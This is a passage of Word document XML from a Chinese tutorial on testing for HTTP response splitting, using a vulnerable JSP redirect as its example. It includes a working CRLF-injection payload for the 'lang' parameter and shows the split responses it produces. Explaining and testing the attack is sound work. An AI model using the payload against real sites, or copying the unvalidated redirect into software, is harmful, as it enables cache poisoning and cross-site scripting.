      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头拆分攻击是一种新型的</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击方式，它产生了很多安全漏洞，</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存感染、用户信息涂改、窃取敏感用户页面、跨站脚本漏洞等。这种攻击方式与其衍生的一系列技术的产生，是由于</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序未对用户提交的数据进行严格过滤和检查，导致攻击者可以提交一些恶意字符，如对用户输入的</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CR </w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidR="00030D6C" w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符没有进行严格的过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5238C30F" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35824DAA"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CR</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LF</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个字符的编码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA373E"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R = %0d = \r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56201C"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F = %0a = \n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AC32A"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下面以</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例分析</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头拆分攻击的原理，如</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(/test.jsp)</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内容如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BDF8CC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFEA27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response.sendRedirect("</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.jsp?lang="+request.getParameter("lang"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAABE7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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6459A6FB"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定义</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang=en</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>test.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>服务器返回</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>302</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重定向到另一个地址，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应内容如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E753A4" w:rsidRPr="007860EA" w14:paraId="43494837"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E67DD8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TTP/1.1 302 Moved Temporarily\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51AA3E9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Date: Wed, 1 Mar 2005 12:53:28 GMT\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B2EEED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ocation: http://192.168.0.1/index.jsp?lang=</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>en</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228D370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Type: text/html\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E84AC43"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nection: Close\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62D139F7"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html&gt;&lt;head&gt;&lt;title&gt;302 Moved Temporarily&lt;/title&gt;&lt;/head&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FA99858"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gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="784612C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p&gt;This document you requested has moved temporarily.&lt;/p&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="334A4517"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gt;&lt;/html&gt;\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D643D0B"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lang</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所赋的值被嵌入在</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Location</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应头中。如果服务器未限制</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数或者校验，攻击者可以修改</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来迫使服务器返回两个响应，将</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值成以下内容：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E753A4" w:rsidRPr="007860EA" w14:paraId="042964E2"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86D1B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en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2024%0d%0a%0d%0a&lt;html&gt;Test page&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="430FD312"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再次访问</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>页面时</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应内容如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E753A4" w:rsidRPr="007860EA" w14:paraId="5E2E8B63"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1306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lastRenderedPageBreak/>
              <w:t>HTTP/1.1 302 Moved Temporarily\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0149E71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Date: Wed, 1 Mar 2005 15:26:41 GMT\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B32F569"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ocation: http://192.168.0.1/</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>index</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>.jsp?lang=</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>en</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CFD7C63"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Length: 0\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6399ACA1" w14:textId="77777777" w:rsidR="00E753A4" w:rsidRPr="007860EA" w:rsidRDefault="00E753A4" w:rsidP="007860EA">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="198089B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TTP/1.1 200 OK\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7330C4B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Type: text/html\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F69A83"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Length: 24\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F924FC1" w14:textId="77777777" w:rsidR="00E753A4" w:rsidRPr="007860EA" w:rsidRDefault="00E753A4" w:rsidP="007860EA">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B0A99D9"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html&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
            <w:r w:rsidRPr="007860EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> page&lt;/html&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50BCE1B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Type: text/html\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="792AFE3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nection: Close\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0166952A"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html&gt;&lt;head&gt;&lt;title&gt;302 Moved Temporarily&lt;/title&gt;&lt;/head&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57752D5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 bgcolor="#FFFFFF"&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455A696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p&gt;This document you requested has moved temporarily.&lt;/p&gt;\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="388B970C"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gt;&lt;/html&gt;\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AA6419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标红部分是</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数的值，从上述</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应中可以看出，该响应包含了两条</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>302</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，请求</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面，浏览器匹配</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTTP/1.1 302</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FE60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浏览器接收到</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>响应后解析到</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Content-Length: 0</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>认为响应内容已经结束</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>然后请求重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>http://192.168.0.1/</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>.jsp?lang=en</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>请求内容如下</w:t>
      </w:r>
      <w:r w:rsidRPr="007860EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E753A4" w:rsidRPr="007860EA" w14:paraId="2B86031D"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9352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GET http://192.168.0.1/index.jsp?lang=en HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4799B885"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ost: 192.168.0.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F48907E"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User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20100101 Firefox/20.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDC2B3B"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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1273613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Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F6501D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Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1105BD2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Referer: http://192.168.0.1/index.jsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24354AD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nection: keep-alive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="669FFE5F" w14:textId="4F32288E" w:rsidR="00A944EF" w:rsidRPr="007860EA" w:rsidRDefault="00E753A4" w:rsidP="007860EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
